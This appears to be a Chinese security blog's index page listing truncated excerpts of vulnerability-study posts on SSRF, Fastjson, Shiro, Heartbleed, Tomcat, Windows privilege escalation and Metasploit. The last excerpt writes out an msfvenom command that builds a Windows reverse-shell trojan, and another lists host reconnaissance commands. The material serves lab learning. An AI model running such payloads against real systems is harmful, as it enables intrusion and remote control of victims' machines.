计1801 (广东外语外贸大学)

  • SSRF漏洞

    SSRF漏洞 SSRF(Server-Site Request Forery)服务端请求伪造 形成原因 服务端提供了从其他服务器获取数据的功能,但没有对内网目标地址做过滤和限制。 容易出现的地方:将url请求作为参数请求资源时发生,分享、下载图片、从别的服务器请求资源等 主要利用方式 1.对外网、服
    cjz12138   2021-07-10 15:38   0   59
  • jquery安全相关

    jquery安全相关 https://cloud.tencent.com/developer/article/1516331 查看jquery版本方法 在网页源码中查看 console打印$.fn.jquery console打印 jquery低版本xss漏洞 漏洞复现工具 https://gith
    cjz12138   2021-07-10 15:34   0   103
  • Fastjson1.2.24 RCE漏洞复现

    Fastjson1.2.24 RCE漏洞复现 环境搭建 vulhub docker搭建 docker-compose up -d 部署在kali的8090端口 java jdk版本 漏洞利用需要jdk8,而kali自带的jdk是jdk11 先卸载kali的jdk dpkg --list | grep
    cjz12138   2021-07-10 15:32   0   90
  • HTTPS加密(SSL)

    HTTPS加密(SSL) 基本原理 1.客户端向服务端发送https请求,即输入网址后,链接到服务器的443端口 2.在服务端(如果采用https协议的话)就必须要有一套数字证书,这个证书其实就是一对公钥和私钥。 3.客户端请求完后,服务端会向客户端发送一个证书,也就是一个公钥,这里称作公钥A,里面
    cjz12138   2021-07-10 15:28   0   360
  • open-SSL心脏滴血漏洞

    open-SSL心脏滴血漏洞 在客户端和服务端建立了TLS加密连接状态后,需要隔一段时间来发送心跳数据包来确保对端是否在线 具体做法是客户端发送Client Hello 数据包,服务端返回Server Hello数据包 在client hello 数据包中有个字段length询问字符长度,当leng
    cjz12138   2021-07-10 15:18   0   210
  • TOMCAT CVE-2017-12165复现

    TOMCAT CVE-2017-12165复现 漏洞原理 在tomcat的配置文件web-xml中,有一项参数叫readonly 默认为true ,如果被改成了false 则允许了http的DELETE 和 PUT 方法, 导致可以上传jsp执行任意代码 环境搭建 用docker + vulhub搭
    cjz12138   2021-07-10 15:08   0   65
  • Springboot框架actuator配置不当修复方案及验证详细

    Springboot框架actuator配置不当修复方案及验证详细 1.判断是否使用了Springboot框架 方法一: 查看网页图标 如果是类似SpringBoot框架的默认图标 这样的图标则大概率是使用了该框架 方法二:在方法一如果不能完全确定时,可以在网页路径在输入错误路径导致网页报错 查看网
    cjz12138   2021-07-10 15:06   0   2307
  • Shiro1.2.4RememberMe反序列化漏洞

    Shiro1.2.4RememberMe反序列化漏洞 针对Shiro版本1.2.4以下有效,Shiro是一个java框架 漏洞原理 Apache Shiro 有记住密码的功能,在登录成功后会生成字段setcookie 而这个cookie值是经过序列化 AES加密 base64编码得到 而在Shiro
    cjz12138   2021-07-10 15:02   0   149
  • windows提权

    windows提权 信息收集 收集内容包括:操作系统信息、补丁情况、安装软件的情况、安装防护软件情况、端口开放情况 systeminfo hostname //主机名 set //环境变量 net user //用户 tasklist /svc //查看服务和pid /svc查看进程中的服务 net
    cjz12138   2021-07-10 14:56   0   116
  • metasploit

    metasploit 木马生成与监听 msfvenom -p windows/meterpreter/reverse_tcp -lhost=192.168.1.1 lport=4444 -f exe -o /tmp/shell.exe //生成windows下的木马文件 use exploit/mu
    cjz12138   2021-07-10 14:51   0   44